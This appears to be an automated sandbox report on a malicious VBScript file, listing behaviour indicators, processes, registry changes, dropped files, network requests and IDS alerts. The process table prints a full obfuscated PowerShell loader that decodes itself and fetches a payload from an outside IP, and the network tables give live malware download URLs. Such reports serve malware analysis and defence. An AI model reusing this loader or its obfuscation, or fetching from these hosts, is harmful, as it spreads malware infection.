| File name: | f9a51686ace6a200b6c9de7b9a8cd18c6ab67e6841ba64bf1518932ccd78bf78.vbs |
| Full analysis: | https://app.any.run/tasks/e4888a48-8340-4ab2-a57c-031188234b95 |
| Verdict: | Malicious activity |
| Analysis date: | May 04, 2024, 08:02:54 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (544), with CRLF line terminators |
| MD5: | 913FA02445AA8092996AD3F000AA1EA1 |
| SHA1: | C29022193884BAEB4AAD8A94884995EA80BDEB25 |
| SHA256: | F9A51686ACE6A200B6C9DE7B9A8CD18C6AB67E6841BA64BF1518932CCD78BF78 |
| SSDEEP: | 6144:PJITON4vsj1oLXVAFN6oDpLfcW6PGOYQO+17ezWSUqE19eAV/KE3JSlkiuqIQK9Y:hcKJkRH3E |
MALICIOUS
Changes the autorun value in the registry
- reg.exe (PID: 6684)
SUSPICIOUS
Starts CMD.EXE for commands execution
- powershell.exe (PID: 6496)
- powershell.exe (PID: 3592)
- wscript.exe (PID: 6220)
- wab.exe (PID: 6640)
Unusual connection from system programs
- powershell.exe (PID: 6496)
Creates FileSystem object to access computer's file system (SCRIPT)
- wscript.exe (PID: 6220)
Runs shell command (SCRIPT)
- wscript.exe (PID: 6220)
Uses sleep to delay execution (POWERSHELL)
- powershell.exe (PID: 6496)
- powershell.exe (PID: 3592)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 6220)
- powershell.exe (PID: 6496)
Reads data from a binary Stream object (SCRIPT)
- wscript.exe (PID: 6220)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 6496)
- powershell.exe (PID: 3592)
The Powershell connects to the Internet
- powershell.exe (PID: 6496)
Converts a specified value to a byte (POWERSHELL)
- powershell.exe (PID: 3592)
Reads security settings of Internet Explorer
- wab.exe (PID: 6640)
Reads the date of Windows installation
- wab.exe (PID: 6640)
Uses REG/REGEDIT.EXE to modify registry
- cmd.exe (PID: 6660)
Executes application which crashes
- wab.exe (PID: 6640)
INFO
Converts byte array into ASCII string (POWERSHELL)
- powershell.exe (PID: 6496)
- powershell.exe (PID: 3592)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 3592)
- powershell.exe (PID: 6496)
Gets data length (POWERSHELL)
- powershell.exe (PID: 3592)
- powershell.exe (PID: 6496)
Uses string split method (POWERSHELL)
- powershell.exe (PID: 6496)
- powershell.exe (PID: 3592)
Checks proxy server information
- powershell.exe (PID: 6496)
- wab.exe (PID: 6640)
- WerFault.exe (PID: 920)
Checks supported languages
- wab.exe (PID: 6640)
Reads the computer name
- wab.exe (PID: 6640)
Process checks computer location settings
- wab.exe (PID: 6640)
Reads the software policy settings
- slui.exe (PID: 6232)
- WerFault.exe (PID: 920)
Creates files or folders in the user directory
- WerFault.exe (PID: 920)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
148
Monitored processes
21
Malicious processes
4
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 920 | C:\WINDOWS\SysWOW64\WerFault.exe -u -p 6640 -s 1436 | C:\Windows\SysWOW64\WerFault.exe | wab.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Problem Reporting Exit code: 0 Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1280 | C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -Embedding | C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft OneDriveFile Co-Authoring Executable Exit code: 0 Version: 19.043.0304.0013 Modules
| |||||||||||||||
| 1364 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3592 | "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.bal L.vn:Sta iFThyreroplbeeSherieRefinlValgbaRetinnbevi,cvar.ee SaagrN ninsC.ook= SurfNLkkereTribuwSk am-Tire OUnprobEidesjBitumeStyrmckor otSurm. HjagtSBle.iy SupesUnsu.tTilkeeMak rmPlta.. LmmeNTela,e UnvetPrvel. VegeWmeniseKiwieb ReupC AntilUnsa.iSpe ieVint nTeglvta alo ');biblioteksfilerne (Tyknende '.nfan$ DeusFFam,lr TiggeThodueIndsalLeakia Helln.ortvc udvaeH nstrVolumsMe.le.,ekonHO.stdeRedera VinedDiftoeBasrerSeculsGaast[Gidse$BaadsPRadiorAp.thi.ublem Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende ' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntegeForvar bekms Gr,p.Adju D no coInsu.wEtabln B.valAn icoOrenjaStj.rdBegreFGrundiP,efalU,vuleKrigs( Hydr$ba,reDFoldaiTorpeeGauffnRefle,Robin$GematoMalesvExtrae omarstramdVagtmrMatt,ythion)Hagta ';$Naturtr=$Titar[1]+$Naturtr;$overdry=$Titar[0];biblioteksfilerne (Tyknende 'Respi$Unling ,haklSanitoImmunbKoereaCortel Wise:.hmsmESta.ls TanztAd.omhF imreSommesGiganiDkfaboBitism,chelemi,rot Fr,srHomelyPos e1Unruf7Ne,to6 Anti=Alter(UncliTF,agmeBordesTzaritMarse-CoccoPPolyea Catat BesthAfliv Arbej$FestioMyriavIsraeeWal,arPaatrdCountr roreyPaasy)Sivap ');while (!$Esthesiometry176) {biblioteksfilerne (Tyknende 'S vsk$,nequgSkindlDummeoSyst bMote.aStereladmir:Maro L MaraeStrghvProp ePhot.mHoneya DryanB,rkndNeg.rsOve v= s.id$C asstUn eurPreinu SkraeI,gtt ') ;biblioteksfilerne $Naturtr;biblioteksfilerne (Tyknende 'FradrS,rakvtDentnaAbdicrRec mt,dult-BashfSSaltblSaddeeRukaneTen.epHerop Srgem4Bakov ');biblioteksfilerne (Tyknende 'pulve$Extrag TolllRubasoEsotebUenigaafgrel.alad: HvsnEPustesB,mbltSidsthEspoueServisunnaki FdevoGuldsmExpuneTravet EmnerSov kyPo.tl1De.el7 Co r6Ha ay= O.pl(I,venT Svi,eForplsFds etVinte-Ke,tsPper,daPerittRhodehSjatt Firaa$ForsyoUnhusvRe,ece Ant,rH.mogdDese r Wo,syInter)A,fri ') ;biblioteksfilerne (Tyknende 'Reg,s$Kemikg Duv.lHeno,oUnideb Ho.kaMa telNonev: popSAp oceBrassp DiaktbarkeiBeskrs.rnseyClinil SkatlHyperaCharmb ChrolDy.ehesi if=Strej$ cla,gDemesl D buoBedlabNarkoaBardulViles:Arb.jC Lagra F.agtU.hunt.enselRingleChan.gSvrdla,aveetC,cobeTelen1Aden +Penan+Nause%Ridde$Vak.eFOkariaSt ute OverrFestsdRetspiMiljagSpads. Therc Fi eoPerjuuStikknFrem.tEnsn ') ;$Dien=$Faerdig[$Septisyllable];}biblioteksfilerne (Tyknende 'Multi$UnsuigMicrolStumpoL icibRevleaBogydlCont :PotomFned.roBedu,s PowesBat hePre,crKybel gasbl= Trai estheGAnimee eizit kemi- NonjCB,ldioRet hnGaasetara,ieRrelsnTjlestExcub Sator$KonduoLitt.vBepapeH,emmrIntemdSeniarAfkray Male ');biblioteksfilerne (Tyknende 'Nonde$ByretgBrugslEvacuoTjenebDadelaOpk elUdsen: A chP For.otranssT rteiDkstitLovgiiUds ro ,rilnSlidssFri,tao,erdnG,dfrgJaskei AcnevInconebyltelMattbsR,vene esmo .aret=,orsk Acaro[VestaS Un.ryHe.tasSa met.renieEvalum,ontr. .echCHarbro Mun nAsc.ivTopngeBolsjr Ko mtEpico]React:Mange: DecaFGamogr Ud.eomik om ermiBd.sseaTornesSpendeSe.su6 Jock4nonniSSny etTreetrMerc iProren nfeagPlica(Surpl$tidehFCodoro ellsHvirvsFlutee De,irUndow)Count ');biblioteksfilerne (Tyknende 'Synsp$Siccig Ca dlTa,sto.rolebNogleaRenholStagn:B rfoDNordbeScrimlKro.seTropog KisteSilverBoghve Afbrt Sel mRembudB.dgeeunglor Puka ,rvle=Moder Marqu[to,roSPartiy KaolsSnibbtNonioe ,nibmUnbef.Af lrTGgegeeHushaxBord,tNonv,. ubsaESforzn Illuc posio SkuldCo upiYppetnSabbigNorde]Norda:,unkt:CustoA yveSEfterCFortsIS entIAnusi.Ska,tGPeccaeVeiletTovtrSTin ltBrummr DialiN,nrenslvfegSten,(Vrdia$ V deP T,rooAcyansOateriTramwt PoleiSixpeoBevirn FestsA.eolaUndebnNonprg plebiCog.ov,rovie S.mil.oglesMentaeHello)Ratif ');biblioteksfilerne (Tyknende 'Junni$ForhagGieselJoyproMedlbb Ultia Umynl emin:AaremBFernaiVernansljferty,edePneums sinu=Knogl$ForpaDSphegeTra ilvers.eVrikdgNord,e Frosr OdoneZombitS,rtemStipud trope Rejnr ,eli.AriadsTypoguV.ntubCephasResidt yprer ProfiNonnenHoe.lgKonfe(Ceilo2Bgesp8Advi 4 Anra0Contr2 Uove1Admin, S dd2 Opsl8Drfta4 B,ho7 Medi1Biolu)Novit ');biblioteksfilerne $Binres;" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5012 | "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo f7f81a39-5f63-5b42-9efd-1f13b5431005quot; | C:\Windows\SysWOW64\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5620 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6220 | "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\f9a51686ace6a200b6c9de7b9a8cd18c6ab67e6841ba64bf1518932ccd78bf78.vbs | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 6232 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6252 | ping google.com -n 1 | C:\Windows\System32\PING.EXE | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6260 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | PING.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
22 044
Read events
22 006
Write events
38
Delete events
0
Modification events
| (PID) Process: | (6220) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (6220) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (6220) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (6220) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (6496) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (6496) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (6496) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (6496) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (6496) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (6496) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
Executable files
0
Suspicious files
5
Text files
7
Unknown types
3
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 920 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_wab.exe_98abb7ba99124566078909f87b74d2470a2d64e_6eaa1cb6_686c75f3-27a0-4ed1-a72d-d76c02d9e9dd\Report.wer | — | |
MD5:— | SHA256:— | |||
| 920 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C87.tmp.WERInternalMetadata.xml | xml | |
MD5:1521FCA272040CBA94E68AC9449E3258 | SHA256:D1F58CA367F9C9F350C498EAB685CA25A52570F75AE4FDBC250BD7F6F97CEC7E | |||
| 6496 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_z415moox.0p0.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 920 | WerFault.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\21253908F3CB05D51B1C2DA8B681A785 | binary | |
MD5:689D97EE498A00A6567889E13F992D1E | SHA256:85A49DED7F5817FF3A43543FC1F0597571F838442E910BEC56ED09516F2988AB | |||
| 3592 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zkhzbdri.msc.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6496 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rhvkbkve.lde.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3592 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 6496 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:443B5F50AC522DBA71EC3CB00CCBA4FC | SHA256:4CDD785200CA3FCB6FDD32B51B34D1F2A626CFCA0C28F3DE80BD96D421D82C69 | |||
| 920 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CB7.tmp.xml | xml | |
MD5:F619D7B5AF43D14C0CD1380018FF1428 | SHA256:5D93F64FE05812BE2922EC7504C89B68DE0C8799695F977E85A93990BF25F170 | |||
| 920 | WerFault.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\21253908F3CB05D51B1C2DA8B681A785 | der | |
MD5:23E663AD81C9272BE5114F8C7E4DD1D5 | SHA256:E8A891BD9CC0448A7E7A33E03CF14A184069FEE7BF1E2EB853FE06E517562948 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
58
DNS requests
23
Threats
2
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5632 | svchost.exe | GET | 200 | 2.18.97.123:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
6496 | powershell.exe | GET | 200 | 87.121.105.54:80 | http://87.121.105.54/Oxaluria209.smi | unknown | — | — | unknown |
4680 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | — | — | unknown |
5196 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | unknown |
6176 | SIHClient.exe | GET | 200 | 88.221.125.143:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | unknown |
6880 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | unknown | — | — | unknown |
6176 | SIHClient.exe | GET | 200 | 88.221.125.143:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | unknown |
920 | WerFault.exe | GET | 200 | 88.221.125.143:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
6640 | wab.exe | GET | 200 | 87.121.105.54:80 | http://87.121.105.54/vKdsOriqv105.bin | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5632 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4380 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5140 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4364 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
6496 | powershell.exe | 87.121.105.54:80 | — | Vivacom | BG | unknown |
5632 | svchost.exe | 2.18.97.123:80 | www.microsoft.com | Akamai International B.V. | FR | unknown |
4680 | SearchApp.exe | 2.19.96.106:443 | www.bing.com | Akamai International B.V. | DE | unknown |
4680 | SearchApp.exe | 2.19.96.104:443 | www.bing.com | Akamai International B.V. | DE | unknown |
4680 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
r.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
login.live.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
arc.msn.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
6496 | powershell.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 11 |
6640 | wab.exe | Potentially Bad Traffic | ET HUNTING Generic .bin download from Dotted Quad |